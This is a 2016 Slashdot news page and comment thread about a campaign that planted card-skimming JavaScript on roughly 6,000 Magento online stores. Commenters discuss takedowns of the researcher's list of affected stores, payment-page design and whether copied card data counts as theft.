Hackers Hit 6,000 Sites On Active 18-Month Carding Spree (theregister.co.uk)

← Back to Stories (view on slashdot.org)

Hackers Hit 6,000 Sites On Active 18-Month Carding Spree (theregister.co.uk)

Posted by BeauHD on Friday October 14, 2016 @01:25PM from the shopping-spree dept.

mask.of.sanity writes from a report via The Register: Hackers have installed skimming scripts on more than 6,000 online stores and are adding 85 each day in a wide-scale active operation that may have compromised hundreds of thousands of credit cards. The malware is infecting stores (full list) running vulnerable versions of the Magento ecommerce platform, and also compromised the U.S. National Republican Senatorial Committee store. "Given that there are [about] 5,900 other skimmed stores, and the malpractice has been going on since at least May last year, I would expect the number of stolen cards in the hundreds of thousands," said Dutch developer Willem de Groot. You can read his blog post to learn more.

39 comments

Min score:

Reason:

Sort:

So basically by Anonymous Coward · 2016-10-14 13:27 · Score: 0

Nothing that hasn't already been done repeatedly in the last few decades
1. Re:So basically by Nutria · 2016-10-14 13:41 · Score: 1
  
  "few decades" is a bit of a stretch. "15 - 20 years" is much more reasonable.
  
  --
  "I don't know, therefore Aliens" Wafflebox1
Dead Link by mallyn · 2016-10-14 13:33 · Score: 1

Folks:
Your link at: https://gist.github.com/gwille... is dead. Please ensure that this is correct.
Thank you.

--
Most Respectfully Yours Mark Allyn Bellingham, Washington
1. Re:Dead Link by Anonymous Coward · 2016-10-14 13:36 · Score: 0
  
  Horse shit detected.
  It's not dead. I get a 404 error, as expected.
2. Re:Dead Link by Anonymous Coward · 2016-10-14 13:39 · Score: 0
  
  it was already taken down and if you look at the blog, there's a new link. it also appears to have been taken down.
3. Re:Dead Link by Anonymous Coward · 2016-10-14 13:44 · Score: 1
  
  Yep. Although at least the second link seems to have been captured by the wayback machine:
  http://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813
4. Re:Dead Link by Nutria · 2016-10-14 13:51 · Score: 1
  
  14kgoldteeth.com
  WTF?
  
  --
  "I don't know, therefore Aliens" Wafflebox1
5. Re:Dead Link by Anonymous Coward · 2016-10-14 14:27 · Score: 0
  
  Having a little trouble with this link. This one should be forever good. https://archive.fo/8u0iB
6. Re:Dead Link by Anonymous Coward · 2016-10-14 14:31 · Score: 1
  
  GitHub censored his research and advisories, and deleted the posts. He has moved to GitLab, which most people should be doing anyway given GitHub's cultural issues.
7. Re:Dead Link by Anonymous Coward · 2016-10-14 15:14 · Score: 0
  
  Seems like gitlab also kicked his data off, there is nothing there anymore either...
8. Re:Dead Link by Anonymous Coward · 2016-10-14 15:50 · Score: 0
  
  Archive of the Gitlab page: https://archive.fo/8u0iB
9. Re:Dead Link by Anonymous Coward · 2016-10-14 16:19 · Score: 0
  
  What is it with git and censoring, everyone should move their projects to CVS or Walgreens
10. Re:Dead Link by jcr · 2016-10-15 04:40 · Score: 0
  
  GitHub's cultural issues
  Is that the place where the SJWs threw a fit over a sign that said "meritocracy"?
  -jcr
  
  --
  The only title of honor that a tyrant can grant is "Enemy of the State."
11. Re:Dead Link by Anonymous Coward · 2016-10-15 06:48 · Score: 1
  
  Is that the place where the SJWs threw a fit over a sign that said "meritocracy"?
  Yes, and where SJWs tried to force a "Code of Conduct" onto developers, and where SJWs have appeared in droves pulling stunts like trying to get contributors removed for their personal beliefs that have nothing to do with their project, and throwing victim tantrums because their pull requests weren't accepted. The site and its employees encourage this garbage.
12. Re:Dead Link by jcr · 2016-10-15 08:52 · Score: 1
  
  Holy crap, that "djangoconcardiff" character sounds awfully desperate for attention.
  -jcr
  
  --
  The only title of honor that a tyrant can grant is "Enemy of the State."
Where does the payment data go? by Anonymous Coward · 2016-10-14 13:48 · Score: 0

> Once a store is under control of a perpetrator, a (Javascript) wiretap is installed that funnels live payment data to an off-shore collection server (mostly in Russia).
PUUUTIINNN!!!
1. Re: Where does the payment data go? by Anonymous Coward · 2016-10-15 01:47 · Score: 0
  
  Yeah, right, put tin never heard of redirection? Spoof?
2. Re:Where does the payment data go? by grumling · 2016-10-15 04:13 · Score: 1
  
  http://www.noagendashow.com
  
  --
  "Well, good luck finding a judge that doesn't run a bestiality site."
Everyone who deployed Magento instead of hiring me by Narcocide · 2016-10-14 13:58 · Score: 1

Told you so. Idiots. Who's untrustworthy now?
They missed thousands of stores! by Gravis+Zero · 2016-10-14 14:05 · Score: 1

There are at least 3,500 other skimmed stores. That's right, there are over 9000! ;)

--
Anons need not reply. Questions end with a question mark.
original article and data by Anonymous Coward · 2016-10-14 14:20 · Score: 0

https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
http://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813
Github just censored my research data by Anonymous Coward · 2016-10-14 14:26 · Score: 0

https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
1. Re:Github just censored my research data by Anonymous Coward · 2016-10-14 14:38 · Score: 0
  
  https://gitlab.com/gwillem/public-snippets/snippets/28813 is 404
  Did gitlab get a DMCA takedown as well?
Card number disclosure by manu0601 · 2016-10-14 14:44 · Score: 2

Why do the stores have to see the card numbers? Each time I purchase online, the store redirects me to a payment site tied to its bank.
1. Re:Card number disclosure by Anonymous Coward · 2016-10-14 22:21 · Score: 1
  
  Why do the stores have to see the card numbers? Each time I purchase online, the store redirects me to a payment site tied to its bank.
  Well, they took entire control of the websites, so it wouldn't have changed anything.
  They could redirect you to a fishing website looking like an existing bank with a similar URL, and they could process the legitimate payment at the same time (and if they don't for some reason, they can still easily move your order forward as if the legitimate payment got through, and get away with it until the store notices they aren't actually receiving money on their account anymore... I suppose most small stores don't check everyday...).
  The solution would be to restrict payment processing to a known list of independent intermediaries, and having your browser check it before entering your card info. Well, until they get compromised too. Or your browser. Or your computer. Or your router/modem.
  Still, many things are easily possible to at list reduce the risks. But most people, both professional and private individuals, simply don't do anything, or far too little. Most don't even really understand anything about all this, even though it's talked about so much from a long time. And it's not really that much about money or time. Everything is just completely messed up in this world. It's just insanity.
2. Re: Card number disclosure by Anonymous Coward · 2016-10-15 01:53 · Score: 0
  
  Yes, agreed. But, you are asking for every mom and pop to be a security programmer. And have equal abilities, they do, actually, but the simplest is sales, not security. So they hire someone, whose skillet is security that they can afford, usually not the class leader, but middle of the pack, that couldn't sell anything, any problems there?
3. Re: Card number disclosure by Anonymous Coward · 2016-10-15 03:16 · Score: 0
  
  For a while, redirects to payment sites like PayPal were considered to add unwanted "friction" that drove up cart abandonment.
  Recently, the likely most popular gateway, at least in the US, Authorize.net has added options that allow more seamlessly integrated payment forms that bypass the store's server, though may not foil browser based skimming.
  Magento had been unable to stop this type of attack, even for fully patched stores. The attack surface is far to large for them to manage and the bulk of Magento installs are managed by people with little IT experience.
4. Re:Card number disclosure by illtud · 2016-10-15 10:23 · Score: 1
  
  Many, many sites don't, and this doesn't grab your card details server-side, it serves up some JS that makes your browser send the card details to $BADIP as you enter it.
5. Re:Card number disclosure by Anonymous Coward · 2016-10-16 23:20 · Score: 0
  
  My answer to this is Paypal . So far never a problem
My boss was skimmed at wellforces 6 months ago by Anonymous Coward · 2016-10-14 18:32 · Score: 0

They were told, but they said that there was no issue and the site was secure.
So obviously they had another 6 months worth of cards skimmed in that time.
Updated host and link by klui · 2016-10-14 20:44 · Score: 1

Update: http://gwillem.gitlab.io/2016/...
Link: https://gitlab.com/gwillem/pub...
1. Re:Updated host and link by cruff · 2016-10-15 00:56 · Score: 1
  
  This link returns a 404 now also.
Not stolen by Calydor · 2016-10-14 21:24 · Score: 0

Let's be honest, the cards aren't stolen. The owners of the cards still have them.
Copied, however ...

--
-=This sig has nothing to do with my comment. Move along now=-
1. Re:Not stolen by Anonymous Coward · 2016-10-14 22:35 · Score: 0
  
  Let's be honest, the cards aren't stolen. The owners of the cards still have them.
  Copied, however ...
  Well, the cards haven't been copied either, just the online payment info entered by the clients, in this case. Contrarily to what is said, it's not a skimming case (if we understand skimming as copying magnetic stripe or chip data).
  (And if you or someone else is thinking about making a cynical parallel to 'pirated' movies, songs and books, they are published, or intended to be published soon, while payment info is private, so it is a different situation).
2. Re:Not stolen by Anonymous Coward · 2016-10-14 22:48 · Score: 0
  
  It's closer to theft than piracy is. Once your card number has been copied, you have to stop your card and get a new one. So unlike in piracy, the real owner of the card is deprived of use of the card until the replacement arrives.
3. Re:Not stolen by Anonymous Coward · 2016-10-15 08:18 · Score: 0
  
  It's closer to theft than piracy is. Once your card number has been copied, you have to stop your card and get a new one. So unlike in piracy, the real owner of the card is deprived of use of the card until the replacement arrives.
  Have to stop? Nope, you can keep using it, with diminished revenue, just like the movie studios or record companies. Not deprived, just, you know, sharing it.
Lists of compromised web sites have been removed by Anonymous Coward · 2016-10-15 05:00 · Score: 0

Lists of compromised web sites have all been removed.
Perhaps this story could be reposted if/when there is a list that is permanently available?
Re:Lists of compromised web sites have been remove by Anonymous Coward · 2016-10-15 08:16 · Score: 0

Or the special entitled snowflake could, like, google?
and also compromised the U.S. National Republican by Anonymous Coward · 2016-10-18 05:51 · Score: 0

It must be the Russians!